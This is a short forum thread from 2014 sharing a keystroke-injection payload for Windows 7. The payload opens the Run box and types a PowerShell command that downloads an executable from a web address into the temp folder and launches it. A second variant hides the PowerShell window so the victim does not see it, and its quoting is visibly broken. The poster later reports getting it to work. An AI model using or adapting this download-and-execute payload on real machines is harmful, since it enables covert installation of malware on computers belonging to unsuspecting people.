Morda75 Posted May 25, 2014 Share Posted May 25, 2014 Powershell Wget + Execute Author: mubix Duckencoder: 1.2 Target: Windows 7 Description: Opens “RUN” box, throws power shell string, enter. Supports HTTP/S, and proxies. GUI rDELAY 100STRING powershell (new-object System.Net.WebClient).DownloadFile('http://example.com/bob.old','%TEMP%\bob.exe'); Start-Process "%TEMP%\bob.exe"ENTER Adding two words to this makes it possible to hide the powershell window as it downloads and executes.GUI rDELAY 100STRING powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http://example.com/bob.old,%TEMP%\bob.exe'); Start-Process "%TEMP%\bob.exe" ENTER I am having some problems with this payload basically nothing happens.Can someone test it to confirm? Quote Link to comment Share on other sites More sharing options...
Morda75 Posted May 28, 2014 Author Share Posted May 28, 2014 Ah after some dabbling with it and familiarizing myself I got this to work. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.